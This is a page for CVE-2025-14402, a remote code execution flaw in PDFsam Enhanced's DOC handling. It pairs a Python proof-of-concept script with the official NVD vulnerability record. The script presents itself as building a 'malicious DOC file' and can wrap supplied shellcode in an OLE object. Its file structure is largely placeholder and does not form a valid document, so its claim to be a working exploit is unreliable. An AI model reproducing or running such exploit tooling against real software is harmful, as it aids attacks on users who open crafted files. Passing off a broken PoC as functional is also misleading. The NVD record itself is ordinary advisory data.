CVE-2025-14402

#!/usr/bin/env python3 # CVE-2025-14402 PoC - PDFsam Enhanced DOC File RCE # This PoC demonstrates the vulnerability in DOC file processing import struct import os def create_malicious_doc(output_path): """ Create a malicious DOC file that exploits CVE-2025-14402 The vulnerability allows execution of dangerous scripts without user warning """ # DOC file header (minimal structure) doc_header = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1' # OLE2 compound document structure ole_header = doc_header + (b'\x00' * 8) # Directory entry for embedded object # This structure contains the malicious payload dir_entry = bytearray(128) # Object stream with embedded executable code # In real attack, this would contain shellcode or malicious script malicious_stream = b''' <object id="EmbeddedOLE" type="application/x-msdownload" data="malicious.exe"> <!-- Shellcode or executable content would be here --> <!-- The vulnerability allows this to execute without warning --> </object> ''' # Create the malicious DOC file with open(output_path, 'wb') as f: f.write(ole_header) f.write(dir_entry) f.write(malicious_stream) print(f"[+] Malicious DOC file created: {output_path}") print("[*] When opened in PDFsam Enhanced, the embedded object will execute without warning") def create_ole_embedding(shellcode_path, output_doc): """ Create OLE embedded object with shellcode """ if os.path.exists(shellcode_path): with open(shellcode_path, 'rb') as sc: shellcode = sc.read() # OLE object header ole_obj = b'\x02\x00\x00\x00' ole_obj += struct.pack('<I', len(shellcode)) ole_obj += shellcode with open(output_doc, 'wb') as f: f.write(ole_obj) print(f"[+] OLE embedded DOC created: {output_doc}") if __name__ == "__main__": import sys if len(sys.argv) > 1: output_file = sys.argv[1] else: output_file = "CVE-2025-14402_malicious.doc" create_malicious_doc(output_file) print("\n[*] Note: This is a educational PoC for CVE-2025-14402") print("[*] The actual exploitation requires specific shellcode and PDFsam Enhanced installation")

{"cve": {"id": "CVE-2025-14402", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:46.700", "lastModified": "2026-01-15T17:19:27.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDFsam Enhanced DOC File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of DOC files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27499."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:*", "matchCriteriaId": "6BDD768D-D92D-4D1C-977A-3987C03EACD2"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1090/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}